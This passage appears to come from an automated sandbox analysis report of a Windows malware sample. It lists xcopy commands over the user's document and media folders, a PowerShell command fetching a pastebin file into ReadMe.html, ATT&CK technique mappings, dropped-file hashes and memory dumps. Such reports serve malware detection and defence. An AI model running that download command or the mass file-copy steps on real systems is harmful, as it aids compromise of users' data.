xcopy /y C:\Users\Admin\Documents\FormatUnlock.xml
2⤵
PID:1732

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\GrantDebug.pps
2⤵
PID:1748

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\ImportSearch.pps
2⤵
PID:1868

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\JoinPush.xps
2⤵
PID:1656

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\Opened.docx
2⤵
PID:112

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\PingExpand.pub
2⤵
PID:1556

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\PopGrant.vsx
2⤵
PID:1700

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\PublishWrite.docm
2⤵
PID:1760

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\Recently.docx
2⤵
PID:1396

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\ShowUse.xla
2⤵
PID:1576

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\StartAdd.odp
2⤵
PID:672

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\StartEdit.vssm
2⤵
PID:336

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\SuspendStop.vsdx
2⤵
PID:1956

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\SwitchInstall.pot
2⤵
PID:1068

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\These.docx
2⤵
PID:1076

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\UninstallMerge.vst
2⤵
PID:1836

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Documents\UnpublishClear.docm
2⤵
PID:1452

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\AddRestart.M2V
2⤵
PID:1728

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\BackupDismount.fon
2⤵
PID:468

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\CloseFormat.raw
2⤵
PID:1468

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\CompleteExport.wpl
2⤵
PID:1676

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\DismountConvertTo.wmv
2⤵
PID:1504

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\DismountRegister.xht
2⤵
PID:1604

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\DismountUnprotect.easmx
2⤵
PID:1620

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\ExportSend.jpeg
2⤵
PID:1348

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\GrantClose.wvx
2⤵
PID:1276

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\InitializeLimit.vdx
2⤵
PID:560

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\JoinRestore.M2T
2⤵
PID:1340

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\LimitBackup.pps
2⤵
PID:1672

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\OpenTest.jpg
2⤵
PID:1900

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\OutStop.bat
2⤵
PID:812

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\PingConfirm.vst
2⤵
PID:1688

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\RedoConfirm.kix
2⤵
PID:968

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\RemoveRename.ADTS
2⤵
PID:1904

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\RenameTrace.7z
2⤵
PID:1896

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\RepairExpand.au3
2⤵
PID:1976

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\ResolveTrace.txt
2⤵
PID:1684

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\ResumeUpdate.ttf
2⤵
PID:1716

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\SaveFormat.vbs
2⤵
PID:936

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\SearchEnter.edrwx
2⤵
PID:1448

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\SearchStep.cr2
2⤵
PID:2016

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\SelectSave.M2V
2⤵
PID:1224

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\SetDeny.exe
2⤵
PID:1744

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\SuspendBlock.dwg
2⤵
PID:1136

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Music\SwitchNew.dwfx
2⤵
PID:1732

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\ConfirmSwitch.jpg
2⤵
PID:1748

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\ConvertFromExport.dwg
2⤵
PID:1276

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\DebugSend.pcx
2⤵
PID:560

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\DisableStep.dwg
2⤵
PID:1340

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\DismountMove.bmp
2⤵
PID:1672

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\DismountSearch.dxf
2⤵
PID:1900

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\EditGroup.jpg
2⤵
PID:812

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\ExportHide.jpeg
2⤵
PID:1688

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\FindUndo.tif
2⤵
PID:968

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\FormatGet.tif
2⤵
PID:1904

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\InvokeFind.emf
2⤵
PID:1896

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\LockDisable.svg
2⤵
PID:1976

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\MeasureCheckpoint.emz
2⤵
PID:1684

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\My Wallpaper.jpg
2⤵
PID:1716

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\NewCopy.jpg
2⤵
PID:936

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\PingCompress.ico
2⤵
PID:1448

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\ProtectMeasure.png
2⤵
PID:2016

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\PublishWait.raw
2⤵
PID:1224

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\RedoRevoke.wmf
2⤵
PID:1744

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\RenameExit.tif
2⤵
PID:1136

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\ResolveShow.dib
2⤵
PID:1732

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\RestoreLimit.crw
2⤵
PID:1748

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\RestoreUndo.crw
2⤵
PID:1276

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\ResumeInitialize.cr2
2⤵
PID:560

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\SubmitDebug.dib
2⤵
PID:1340

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\SwitchExport.dxf
2⤵
PID:1672

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\TraceNew.pcx
2⤵
PID:1900

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\UnlockSave.emz
2⤵
PID:812

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\UnregisterNew.emz
2⤵
PID:1688

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\UnregisterShow.jpg
2⤵
PID:968

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\WaitOpen.jpg
2⤵
PID:1904

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Pictures\WriteSkip.raw
2⤵
PID:1896

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\ApproveClear.fon
2⤵
PID:1976

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\BlockPop.mid
2⤵
PID:1684

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\CheckpointJoin.mpeg
2⤵
PID:1716

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\ClearUnblock.txt
2⤵
PID:936

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\DebugSkip.xls
2⤵
PID:1448

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\DenyRedo.snd
2⤵
PID:2016

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\DisableGet.wmx
2⤵
PID:1224

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\DisconnectConvert.vdx
2⤵
PID:1744

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\DisconnectRequest.html
2⤵
PID:1136

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\ExpandConfirm.sql
2⤵
PID:1732

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\GrantClose.gif
2⤵
PID:1748

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\GroupConfirm.jfif
2⤵
PID:1276

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\HideCompress.wdp
2⤵
PID:560

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\HideUnlock.iso
2⤵
PID:1340

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\ImportHide.ppt
2⤵
PID:1672

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\InstallSkip.mp2
2⤵
PID:1900

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\LockSplit.TTS
2⤵
PID:812

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\MeasureDisable.php
2⤵
PID:1688

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\MeasureWait.TTS
2⤵
PID:968

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\NewTest.wm
2⤵
PID:1904

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\PublishRegister.cab
2⤵
PID:1896

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\ReadStop.xsl
2⤵
PID:1976

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\RemoveCheckpoint.shtml
2⤵
PID:1684

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\ResetPush.aiff
2⤵
PID:1716

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\RestoreRequest.wax
2⤵
PID:936

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\RevokeDisconnect.M2V
2⤵
PID:1448

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\SaveUse.MOD
2⤵
PID:2016

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\SelectInstall.3g2
2⤵
PID:1224

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\SuspendOpen.mpp
2⤵
PID:1744

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\TraceGroup.jpeg
2⤵
PID:1136

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\UninstallEdit.wpl
2⤵
PID:1732

C:\Windows\system32\xcopy.exe
xcopy /y C:\Users\Admin\Downloads\UnlockSplit.AAC
2⤵
PID:1748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://pastebin.com/raw/CSGTwG5A -outfile ReadMe.html"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Hidden Files and Directories

1

T1158

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Hidden Files and Directories

1

T1158

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
db8349341427b8c6723a6307bcfde310

SHA1
3af17699c8a60c2d110cb5768af1591c7ed742cf

SHA256
0d120c081d1099e20b7095a7aef3da3d697790a96c28e363e6eb1148e4fec64d

SHA512
931fadf2bf665509c48af49db9ca95e671db5f1ca03152cec97621e88964cc5ce00db9eed5b5ab4074131ef84df062ca52b4ab606a275ae11d36a41a4b7e5de4

Download Submit
C:\Users\Admin\Documents\black.bat
Filesize
71B

MD5
3544e4b7ac1418d34061648a9f3e3dc6

SHA1
30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce

SHA256
db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8

SHA512
5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

Download Submit
memory/336-111-0x0000000000000000-mapping.dmp

Download
memory/468-109-0x0000000000000000-mapping.dmp

Download
memory/668-83-0x0000000000000000-mapping.dmp

Download
memory/700-75-0x0000000000000000-mapping.dmp

Download
memory/812-117-0x0000000000000000-mapping.dmp

Download
memory/936-121-0x0000000000000000-mapping.dmp

Download
memory/940-93-0x0000000000000000-mapping.dmp

Download
memory/952-79-0x0000000000000000-mapping.dmp

Download
memory/1012-76-0x0000000000000000-mapping.dmp

Download
memory/1068-113-0x0000000000000000-mapping.dmp

Download
memory/1072-81-0x0000000000000000-mapping.dmp

Download
memory/1076-119-0x0000000000000000-mapping.dmp

Download
memory/1120-87-0x0000000000000000-mapping.dmp

Download
memory/1156-99-0x0000000000000000-mapping.dmp

Download
memory/1176-97-0x0000000000000000-mapping.dmp

Download
memory/1180-92-0x0000000000000000-mapping.dmp

Download
memory/1224-78-0x0000000000000000-mapping.dmp

Download
memory/1276-136-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
memory/1276-133-0x000007FEF2F60000-0x000007FEF3ABD000-memory.dmp

Filesize
11.4MB

Download
memory/1276-101-0x0000000000000000-mapping.dmp

Download
memory/1276-135-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/1276-134-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/1276-132-0x000007FEF3AC0000-0x000007FEF44E3000-memory.dmp

Filesize
10.1MB

Download
memory/1340-112-0x0000000000000000-mapping.dmp

Download
memory/1340-67-0x0000000000000000-mapping.dmp

Download
memory/1348-103-0x0000000000000000-mapping.dmp

Download
memory/1396-105-0x0000000000000000-mapping.dmp

Download
memory/1400-86-0x0000000000000000-mapping.dmp

Download
memory/1448-104-0x0000000000000000-mapping.dmp

Download
memory/1448-120-0x0000000000000000-mapping.dmp

Download
memory/1468-55-0x0000000000000000-mapping.dmp

Download
memory/1468-56-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

Filesize
8KB

Download
memory/1468-57-0x000007FEF4460000-0x000007FEF4E83000-memory.dmp

Filesize
10.1MB

Download
memory/1468-59-0x0000000001EC0000-0x0000000001F40000-memory.dmp

Filesize
512KB

Download
memory/1468-58-0x000007FEF3900000-0x000007FEF445D000-memory.dmp

Filesize
11.4MB

Download
memory/1468-123-0x0000000000000000-mapping.dmp

Download
memory/1504-122-0x0000000000000000-mapping.dmp

Download
memory/1504-106-0x0000000000000000-mapping.dmp

Download
memory/1532-66-0x0000000000000000-mapping.dmp

Download
memory/1548-65-0x0000000000000000-mapping.dmp

Download
memory/1556-107-0x0000000000000000-mapping.dmp

Download
memory/1560-73-0x0000000000000000-mapping.dmp

Download
memory/1564-60-0x0000000000000000-mapping.dmp

Download
memory/1604-110-0x0000000000000000-mapping.dmp

Download
memory/1608-62-0x0000000000000000-mapping.dmp

Download
memory/1608-94-0x0000000000000000-mapping.dmp

Download
memory/1620-124-0x0000000000000000-mapping.dmp

Download
memory/1620-108-0x0000000000000000-mapping.dmp

Download
memory/1628-64-0x0000000000000000-mapping.dmp

Download
memory/1628-95-0x0000000000000000-mapping.dmp

Download
memory/1664-98-0x0000000000000000-mapping.dmp

Download
memory/1664-69-0x0000000000000000-mapping.dmp

Download
memory/1668-85-0x0000000000000000-mapping.dmp

Download
memory/1672-114-0x0000000000000000-mapping.dmp

Download
memory/1676-125-0x0000000000000000-mapping.dmp

Download
memory/1700-71-0x0000000000000000-mapping.dmp

Download
memory/1736-82-0x0000000000000000-mapping.dmp

Download
memory/1760-61-0x0000000000000000-mapping.dmp

Download
memory/1772-68-0x0000000000000000-mapping.dmp

Download
memory/1772-96-0x0000000000000000-mapping.dmp

Download
memory/1784-90-0x0000000000000000-mapping.dmp

Download
memory/1788-84-0x0000000000000000-mapping.dmp

Download
memory/1808-91-0x0000000000000000-mapping.dmp

Download
memory/1820-63-0x0000000000000000-mapping.dmp

Download
memory/1840-77-0x0000000000000000-mapping.dmp

Download
memory/1868-74-0x0000000000000000-mapping.dmp

Download
memory/1896-118-0x0000000000000000-mapping.dmp

Download
memory/1896-102-0x0000000000000000-mapping.dmp

Download
memory/1900-115-0x0000000000000000-mapping.dmp

Download
memory/1904-116-0x0000000000000000-mapping.dmp

Download
memory/1904-100-0x0000000000000000-mapping.dmp

Download
memory/1988-54-0x0000000000000000-mapping.dmp

Download
memory/1996-89-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads